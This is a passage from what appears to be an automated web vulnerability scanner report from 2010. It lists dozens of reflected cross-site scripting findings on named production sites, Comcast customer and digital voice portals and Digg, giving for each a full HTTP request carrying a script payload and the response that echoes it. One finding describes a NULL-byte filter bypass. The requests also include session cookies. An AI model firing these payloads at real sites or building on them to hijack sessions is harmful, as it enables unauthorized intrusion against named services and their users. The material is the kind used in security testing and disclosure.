__utma=24577576.1986915861.1292781826.1292781826.1292781826.1; __utmc=24577576; __utmb=24577576.1.10.1292781826; ASP.NET_SessionId=l2vema45zv4phtzqkshvqf55;

Response

HTTP/1.1 200 OK
Set-Cookie: SLBCCC=R625934426; path=/
Connection: close
Date: Sun, 19 Dec 2010 18:08:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 31588


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
indow).load(function() {
$("#shell a").click(function() {
var overlayUrl = '';
overlayUrl = 'http://customer.comcast.com/Pages/FAQViewer.aspx?48cbb'-alert(1)-'e073ca99f6=1'
//baynote_track_popup3(this.href, window.location.href, '');
BaynoteAPI.call("custom", 'baynote_track_popup3', [this.href, window.location.href, ''], 'wind
...[SNIP]...

2.18. http://customer.comcast.com/Pages/Help.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://customer.comcast.com
Path:   /Pages/Help.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfda2'-alert(1)-'14bdd683d0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Pages/Help.aspx?cfda2'-alert(1)-'14bdd683d0a=1 HTTP/1.1
Host: customer.comcast.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1035; SC=RC.USID=063fb053-dc8f-4e5d-9d03-5b6c874be482; UCID=a989d7e1-b26f-48ab-857b-c7e753595bba; bn_u=6923335571706691164; mbox=PC#1292775334802-298696.20#1293991405|session#1292780810234-197287#1292783665|check#true#1292781865; s_pers=%20s_cpm%3D%255B%255B%2527Keyword%2527%252C%25271292775340969%2527%255D%252C%255B%2527Referrers%2527%252C%25271292775817472%2527%255D%252C%255B%2527Direct%252520Load%2527%252C%25271292775826355%2527%255D%252C%255B%2527Referrers%2527%252C%25271292780811571%2527%255D%252C%255B%2527Direct%252520Load%2527%252C%25271292781768566%2527%255D%255D%7C1450548168565%3B%20s_v5%3D%255B%255B%2527%252526%252523039%25253B%2527%252C%25271292781796322%2527%255D%255D%7C1450548196322%3B%20dfa_cookie%3Dcomcastdotcomprod%7C1292783608847%3B%20gpv_07%3Dcomcast%2520-%2520home%7C1292783608973%3B; s_sess=%20ev41%3D%2526%2523039%253B%3B%20stc18%3D%2526%2523039%253B%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; fsr.s={"cp":{"CustomerID":"bcc4a621-b4c2-40c1-8722-c28eff11af5e"},"v":1,"pv":2,"lc":{"d0":{"v":2,"s":true}},"sd":0}; fsr.a=1292781820476

Response

HTTP/1.0 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:06:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=r11dc3yqy5eqr145p1pu2q55; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 72338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00_Hea
...[SNIP]...
$(window).load(function() {
$("#shell a").click(function() {
var overlayUrl = '';
overlayUrl = 'http://customer.comcast.com/Pages/Help.aspx?cfda2'-alert(1)-'14bdd683d0a=1'
//baynote_track_popup3(this.href, window.location.href, '');
BaynoteAPI.call("custom", 'baynote_track_popup3', [this.href, window.location.href, ''], 'wind
...[SNIP]...

2.19. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009f91c"><script>alert(1)</script>a60ae5d7848 was submitted in the REST URL parameter 1. This input was echoed as 9f91c"><script>alert(1)</script>a60ae5d7848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%009f91c"><script>alert(1)</script>a60ae5d7848 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1938518164606297025%3A141; expires=Tue, 18-Jan-2011 18:07:41 GMT; path=/; domain=digg.com
Set-Cookie: d=beddb1ae9717929527d110b095bdff05a72259ae7bf2bb201bd4dcf834b3181d; expires=Sat, 19-Dec-2020 04:15:21 GMT; path=/; domain=.digg.com
X-Digg-Time: D=245514 10.2.129.76
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15305

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%009f91c"><script>alert(1)</script>a60ae5d7848.rss">
...[SNIP]...

2.20. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 74265<script>alert(1)</script>30d63b2ac0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com74265<script>alert(1)</script>30d63b2ac0f/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:22 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLCcLxLrNlVmBMqgN2n2hJsQDKd2qK8vl9VgYB8h7wmSgGSMVjP!715189861!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com74265<script>alert(1)</script>30d63b2ac0f/comcast/online/dvp/presentation/pageflows/Help/getFAQ</td>
...[SNIP]...

2.21. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9f1d1<script>alert(1)</script>eea8c678143 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast9f1d1<script>alert(1)</script>eea8c678143/online/dvp/presentation/pageflows/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:22 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLCL7vPL4Y0Q2pTLnvGmxRjg11vxtdMvr1JvTp0HmyHNbn5FQ6q!935594247!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast9f1d1<script>alert(1)</script>eea8c678143/online/dvp/presentation/pageflows/Help/getFAQ</td>
...[SNIP]...

2.22. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6eaeb<script>alert(1)</script>d4a64e7fde7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online6eaeb<script>alert(1)</script>d4a64e7fde7/dvp/presentation/pageflows/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:23 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLDXpQPVwR0NSFbDWJ48rhgPGqGFcZCPXzCVpRzn7DWwy19jLq5!-1576092857!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online6eaeb<script>alert(1)</script>d4a64e7fde7/dvp/presentation/pageflows/Help/getFAQ</td>
...[SNIP]...

2.23. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d3d0f<script>alert(1)</script>807ced074d1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvpd3d0f<script>alert(1)</script>807ced074d1/presentation/pageflows/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:24 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLGtRfdWXBmhXRScpp4v9MJpBSnJt2lgG2ry2Pcj77vLRrJhJZp!1431461321!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvpd3d0f<script>alert(1)</script>807ced074d1/presentation/pageflows/Help/getFAQ</td>
...[SNIP]...

2.24. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 77b14<script>alert(1)</script>9cd91501f2a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation77b14<script>alert(1)</script>9cd91501f2a/pageflows/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:24 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLGpRLHMMNQnH4fkKVJRZPpr4818zS3V3RwkRkQ1X1rCyfHxGh0!198205627!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation77b14<script>alert(1)</script>9cd91501f2a/pageflows/Help/getFAQ</td>
...[SNIP]...

2.25. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 7b6f5<script>alert(1)</script>4d76aec21db was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows7b6f5<script>alert(1)</script>4d76aec21db/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:25 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLFJlJV2hcp0DJXC712TSBplDsQLn2NL246M6XtmYTgJTxj0T1C!377427874!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflows7b6f5<script>alert(1)</script>4d76aec21db/Help/getFAQ</td>
...[SNIP]...

2.26. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 62a76<script>alert(1)</script>a79a11159c2 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help62a76<script>alert(1)</script>a79a11159c2/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:26 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLG0hxvHk7cTJp1GQTnh4lbJxLx1yM1vxnGwfJsXnLG7TPBDQWY!715189861!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflows/Help62a76<script>alert(1)</script>a79a11159c2/getFAQ</td>
...[SNIP]...

2.27. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload deaea<script>alert(1)</script>082bf320537 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/comdeaea<script>alert(1)</script>082bf320537/comcast/online/dvp/presentation/pageflows/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:20 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLQqxQ6GV11Wbvp5zS1tmnwpCMblny22XTm5hTLj62pTzBBLTzp!1325758820!-794401224; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>comdeaea<script>alert(1)</script>082bf320537/comcast/online/dvp/presentation/pageflows/Login/authForward</td>
...[SNIP]...

2.28. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3c14<script>alert(1)</script>a205b4c0e20 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcastc3c14<script>alert(1)</script>a205b4c0e20/online/dvp/presentation/pageflows/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:20 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLQVZrBhsxLHvRGZ7hjLppY1FSHbwjwnghLQvQr7Hkmvlv2psph!-1185923515!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcastc3c14<script>alert(1)</script>a205b4c0e20/online/dvp/presentation/pageflows/Login/authForward</td>
...[SNIP]...

2.29. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7d6c8<script>alert(1)</script>59ccf0b3972 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online7d6c8<script>alert(1)</script>59ccf0b3972/dvp/presentation/pageflows/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:21 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLBZywMQ5KZD1CY2LT4c83KM57j22ZpLv086n72VFqgPX1MfzVl!-1576092857!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online7d6c8<script>alert(1)</script>59ccf0b3972/dvp/presentation/pageflows/Login/authForward</td>
...[SNIP]...

2.30. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 22a41<script>alert(1)</script>3524ac4ba0f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp22a41<script>alert(1)</script>3524ac4ba0f/presentation/pageflows/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:22 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLChgQ8y1G1dPYKTygvH2hCR8L8TCS2Z19K9hGN65LJT4QPlKFs!377427874!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp22a41<script>alert(1)</script>3524ac4ba0f/presentation/pageflows/Login/authForward</td>
...[SNIP]...

2.31. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 593da<script>alert(1)</script>3df36c0971c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation593da<script>alert(1)</script>3df36c0971c/pageflows/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:22 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLCBFvV0TtBGyktZLC8Cpcqv6pQF5YvJ4bLYvyLBrvVY9WPpp1R!96692442!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation593da<script>alert(1)</script>3df36c0971c/pageflows/Login/authForward</td>
...[SNIP]...

2.32. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload ccf40<script>alert(1)</script>5f3c611fd1b was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflowsccf40<script>alert(1)</script>5f3c611fd1b/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:23 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLDCKh5dhsLnJpQzVGdbxBhypmqxPlvN8nXxLphc40hhK63M1d1!-762166285!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflowsccf40<script>alert(1)</script>5f3c611fd1b/Login/authForward</td>
...[SNIP]...

2.33. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

